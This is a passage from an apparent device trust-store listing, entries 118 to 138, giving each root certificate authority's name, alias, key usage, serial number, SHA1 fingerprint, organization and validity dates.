Version: 3 Serial Number: 3e8a5d07ec55d232d5b7e3b65f01eb2ddce4d6e4 SHA1 Fingerprint: e252fa953feddb2460bd6e28f39ccccf5eb33fde Issued to: SZAFIR ROOT CA2 Organization: Krajowa Izba Rozliczeniowa S.A. Issued by: SZAFIR ROOT CA2 Organization: Krajowa Izba Rozliczeniowa S.A. Inserted: 31 Dec 2008 Validity: 19 Oct 2015 to 19 Oct 2035 118. D-TRUST Root Class 3 CA 2 EV 2009 Alias: system:d7746a63.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 983f4 SHA1 Fingerprint: 96c91b0b95b4109842fad0d82279fe60fab91683 Issued to: D-TRUST Root Class 3 CA 2 EV 2009 Organization: D-Trust GmbH Issued by: D-TRUST Root Class 3 CA 2 EV 2009 Organization: D-Trust GmbH Inserted: 31 Dec 2008 Validity: 05 Nov 2009 to 05 Nov 2029 119. TeliaSonera Root CA v1 Alias: system:63a2c897.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 95be16a0f72e46f17b398272fa8bcd96 SHA1 Fingerprint: 4313bb96f1d5869bc14e6a92f6cff63469878237 Issued to: TeliaSonera Root CA v1 Organization: TeliaSonera Issued by: TeliaSonera Root CA v1 Organization: TeliaSonera Inserted: 31 Dec 2008 Validity: 18 Oct 2007 to 18 Oct 2032 120. TWCA Root Certification Authority Alias: system:b7db1890.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1 SHA1 Fingerprint: cf9e876dd3ebfc422697a3b5a37aa076a9062348 Issued to: TWCA Root Certification Authority Organization: TAIWAN-CA Issued by: TWCA Root Certification Authority Organization: TAIWAN-CA Inserted: 31 Dec 2008 Validity: 28 Aug 2008 to 31 Dec 2030 121. UCA Extended Validation Root Alias: system:da7377f6.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 4fd22b8ff564c8339e4f345866237060 SHA1 Fingerprint: a3a1b06f2461234ae336a5c237fca6ffddf0d73a Issued to: UCA Extended Validation Root Organization: UniTrust Issued by: UCA Extended Validation Root Organization: UniTrust Inserted: 31 Dec 2008 Validity: 12 Mar 2015 to 30 Dec 2038 122. DigiCert Trusted Root G4 Alias: system:a2c66da8.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 59b1b579e8e2132e23907bda777755c SHA1 Fingerprint: ddfb16cd4931c973a2037d3fc83a4d7d775d05e4 Issued to: DigiCert Trusted Root G4 Organization: DigiCert Inc Issued by: DigiCert Trusted Root G4 Organization: DigiCert Inc Inserted: 31 Dec 2008 Validity: 01 Aug 2013 to 15 Jan 2038 123. Amazon Root CA 2 Alias: system:fb5fa911.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 66c9fd29635869f0a0fe58678f85b26bb8a37 SHA1 Fingerprint: 5a8cef45d7a69859767a8c8b4496b578cf474b1a Issued to: Amazon Root CA 2 Organization: Amazon Issued by: Amazon Root CA 2 Organization: Amazon Inserted: 31 Dec 2008 Validity: 25 May 2015 to 25 May 2040 124. emSign ECC Root CA - C3 Alias: system:869fbf79.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 7b71b68256b8127c9ca8 SHA1 Fingerprint: b6af43c29b81537df6ef6bc31f1f60150cee4866 Issued to: emSign ECC Root CA - C3 Organization: eMudhra Inc Issued by: emSign ECC Root CA - C3 Organization: eMudhra Inc Inserted: 31 Dec 2008 Validity: 18 Feb 2018 to 18 Feb 2043 125. EE Certification Centre Root CA Alias: system:91739615.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Extended Usage: 1.3.6.1.5.5.7.3.2 1.3.6.1.5.5.7.3.1 1.3.6.1.5.5.7.3.3 1.3.6.1.5.5.7.3.4 1.3.6.1.5.5.7.3.8 1.3.6.1.5.5.7.3.9 Version: 3 Serial Number: 5480f9a073ed3f004cca89d8e371e64a SHA1 Fingerprint: c9a8b9e755805e58e35377a725ebafc37b27ccd7 Issued to: EE Certification Centre Root CA Organization: AS Sertifitseerimiskeskus Issued by: EE Certification Centre Root CA Organization: AS Sertifitseerimiskeskus Inserted: 31 Dec 2008 Validity: 30 Oct 2010 to 17 Dec 2030 126. null Alias: system:1dcd6f4c.0 Type: X.509 Entry Type: Certificate Version: 3 Serial Number: 1f9d595ad72fc20644a5800869e35ef6 SHA1 Fingerprint: f48b11bfdeabbe94542071e641de6bbe882b40b9 Issued to: null Organization: Government Root Certification Authority Issued by: null Organization: Government Root Certification Authority Inserted: 31 Dec 2008 Validity: 05 Dec 2002 to 05 Dec 2032 127. GTS Root R1 Alias: system:f013ecaf.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 6e47a9c54b470c0dec33d089b91cf4e1 SHA1 Fingerprint: e1c950e6ef22f84c5645728b922060d7d5a7a3e8 Issued to: GTS Root R1 Organization: Google Trust Services LLC Issued by: GTS Root R1 Organization: Google Trust Services LLC Inserted: 31 Dec 2008 Validity: 21 Jun 2016 to 21 Jun 2036 128. emSign ECC Root CA - G3 Alias: system:b74d2bd5.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 3cf607a968700eda8b84 SHA1 Fingerprint: 3043fa4ff257dca0c380ee2e58ea78b23fe6bbc1 Issued to: emSign ECC Root CA - G3 Organization: eMudhra Technologies Limited Issued by: emSign ECC Root CA - G3 Organization: eMudhra Technologies Limited Inserted: 31 Dec 2008 Validity: 18 Feb 2018 to 18 Feb 2043 129. SSL.com Root Certification Authority RSA Alias: system:33ee480d.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 7b2c9bd316803299 SHA1 Fingerprint: b7ab3308d1ea4477ba1480125a6fbda936490cbb Issued to: SSL.com Root Certification Authority RSA Organization: SSL Corporation Issued by: SSL.com Root Certification Authority RSA Organization: SSL Corporation Inserted: 31 Dec 2008 Validity: 12 Feb 2016 to 12 Feb 2041 130. Amazon Root CA 3 Alias: system:7a7c655d.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 66c9fd5749736663f3b0b9ad9e89e7603f24a SHA1 Fingerprint: 0d44dd8c3c8c1a1a58756481e90f2e2affb3d26e Issued to: Amazon Root CA 3 Organization: Amazon Issued by: Amazon Root CA 3 Organization: Amazon Inserted: 31 Dec 2008 Validity: 25 May 2015 to 25 May 2040 131. GeoTrust Universal CA Alias: system:e775ed2d.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 1 SHA1 Fingerprint: e621f3354379059a4b68309d8a2f74221587ec79 Issued to: GeoTrust Universal CA Organization: GeoTrust Inc. Issued by: GeoTrust Universal CA Organization: GeoTrust Inc. Inserted: 31 Dec 2008 Validity: 04 Mar 2004 to 04 Mar 2029 132. UCA Global G2 Root Alias: system:304d27c3.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 5ddfb1da5aa3ed5dbe5a6520650390ef SHA1 Fingerprint: 28f97816197aff182518aa44fec1a0ce5cb64c8a Issued to: UCA Global G2 Root Organization: UniTrust Issued by: UCA Global G2 Root Organization: UniTrust Inserted: 31 Dec 2008 Validity: 10 Mar 2016 to 30 Dec 2040 133. Starfield Services Root Certificate Authority - G2 Alias: system:10531352.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 0 SHA1 Fingerprint: 925a8f8d2c6d04e0665f596aff22d863e8256f3f Issued to: Starfield Services Root Certificate Authority - G2 Organization: Starfield Technologies, Inc. Issued by: Starfield Services Root Certificate Authority - G2 Organization: Starfield Technologies, Inc. Inserted: 31 Dec 2008 Validity: 31 Aug 2009 to 31 Dec 2037 134. QuoVadis Root CA 3 Alias: system:9339512a.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 5c6 SHA1 Fingerprint: 1f4914f7d874951dddae02c0befd3a2d82755185 Issued to: QuoVadis Root CA 3 Organization: QuoVadis Limited Issued by: QuoVadis Root CA 3 Organization: QuoVadis Limited Inserted: 31 Dec 2008 Validity: 24 Nov 2006 to 24 Nov 2031 135. Amazon Root CA 1 Alias: system:fd08c599.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Key Cert Sign CRL Signing Version: 3 Serial Number: 66c9fcf99bf8c0a39e2f0788a43e696365bca SHA1 Fingerprint: 8da7f965ec5efc37910f1c6e59fdc1cc6a6ede16 Issued to: Amazon Root CA 1 Organization: Amazon Issued by: Amazon Root CA 1 Organization: Amazon Inserted: 31 Dec 2008 Validity: 25 May 2015 to 16 Jan 2038 136. Hongkong Post Root CA 1 Alias: system:9685a493.0 Type: X.509 Entry Type: Certificate Usage: Digital Signature Non Repudiation Key Cert Sign CRL Signing Version: 3 Serial Number: 3e8 SHA1 Fingerprint: d6daa8208d09d2154d24b52fcb346eb258b28a58 Issued to: Hongkong Post Root CA 1 Organization: Hongkong Post Issued by: Hongkong Post Root CA 1 Organization: Hongkong Post Inserted: 31 Dec 2008 Validity: 15 May 2003 to 15 May 2023 137. SwissSign Silver CA - G2 Alias: system:5046c355.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 4f1bd42f54bb2f4b SHA1 Fingerprint: 9baae59f56ee21cb435abe2593dfa7f040d11dcb Issued to: SwissSign Silver CA - G2 Organization: SwissSign AG Issued by: SwissSign Silver CA - G2 Organization: SwissSign AG Inserted: 31 Dec 2008 Validity: 25 Oct 2006 to 25 Oct 2036 138. USERTrust RSA Certification Authority Alias: system:35105088.0 Type: X.509 Entry Type: Certificate Usage: Key Cert Sign CRL Signing Version: 3 Serial Number: 1fd6d30fca3ca51a81bbc640e35032d SHA1 Fingerprint: 2b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e Issued to: USERTrust RSA Certification Authority Organization: The USERTRUST Network Issued by: USERTrust RSA Certification Authority Organization: The USERTRUST Network Inserted: 31 Dec 2008 Validity: 31 Jan 2010 to 18 Jan 2038